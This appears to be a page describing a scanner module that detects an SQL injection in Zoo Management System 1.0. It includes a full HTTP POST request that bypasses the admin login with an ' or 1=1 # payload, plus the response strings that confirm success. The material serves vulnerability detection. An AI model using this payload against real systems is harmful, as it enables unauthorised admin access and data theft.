Zoo Management System 1.0 - SQL Injection

What is the "Zoo Management System 1.0 - SQL Injection?"

The "Zoo Management System 1.0 - SQL Injection" module is designed to detect a SQL injection vulnerability in the Zoo Management System 1.0 software. This vulnerability allows an attacker to potentially access sensitive information from the database, modify data, and execute unauthorized actions. The severity of this vulnerability is classified as critical.

This module was authored by dwisiswant0.

Impact

A successful SQL injection attack on the Zoo Management System 1.0 can have severe consequences. It can lead to unauthorized access to sensitive data, such as user credentials, personal information, or financial records. Additionally, an attacker can manipulate the database, potentially causing data corruption or loss.

How the module works?

The "Zoo Management System 1.0 - SQL Injection" module works by sending a crafted HTTP POST request to the target system. The request is designed to exploit the SQL injection vulnerability in the software. Here is an example of the request:

POST /zms/admin/index.php HTTP/1.1
Host: <Hostname>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Origin:
Referer: /zms/admin/index.php
Cookie: PHPSESSID=<randTextAlphanumeric(10)>

username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=

The module then applies matching conditions to the response received from the target system. It checks if the response body contains the phrases "Zoo Management System || Dashboard" and "ZMS ADMIN". Additionally, it verifies that the response status code is 200.

If all matching conditions are met, the module reports the vulnerability.